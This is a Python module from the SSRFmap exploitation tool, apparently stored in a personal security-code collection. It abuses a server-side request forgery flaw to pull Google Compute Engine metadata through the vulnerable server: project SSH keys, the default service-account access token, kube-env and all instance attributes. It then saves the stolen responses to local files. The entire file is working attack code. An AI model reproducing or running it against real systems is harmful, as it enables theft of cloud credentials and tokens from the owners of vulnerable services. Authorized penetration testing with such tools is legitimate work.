Security_Code/COMMON_CODE半成品-不再更新/下载/SSRFmap-master/modules/gce.py

57 lines
2.2 KiB
Python

from core.utils import *
import logging
import os
name = "gce"
description = "Access sensitive data from GCE"
author = "mrtc0"
documentation = [
"https://cloud.google.com/compute/docs/storing-retrieving-metadata",
"https://hackerone.com/reports/341876",
"https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/"
]
class exploit():
endpoints = set()
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
self.add_endpoints()
r = requester.do_request(args.param, "")
if r != None:
default = r.text
# Create directory to store files
directory = requester.host
if not os.path.exists(directory):
os.makedirs(directory)
for endpoint in self.endpoints:
payload = wrapper_http(endpoint[1], endpoint[0] , "80")
r = requester.do_request(args.param, payload)
diff = diff_text(r.text, default)
if diff != "":
# Display diff between default and ssrf request
logging.info("\033[32mReading file\033[0m : {}".format(payload))
print(diff)
# Write diff to a file
filename = endpoint[1].split('/')[-1]
if filename == "":
filename = endpoint[1].split('/')[-2:-1][0]
logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
with open(directory + "/" + filename, 'w') as f:
f.write(diff)
def add_endpoints(self):
self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json") )
self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/service-accounts/default/token") )
self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/kube-env?alt=json") )
self.endpoints.add( ("metadata.google.internal", "computeMetadata/v1beta1/instance/attributes/?recursive=true&alt=json") )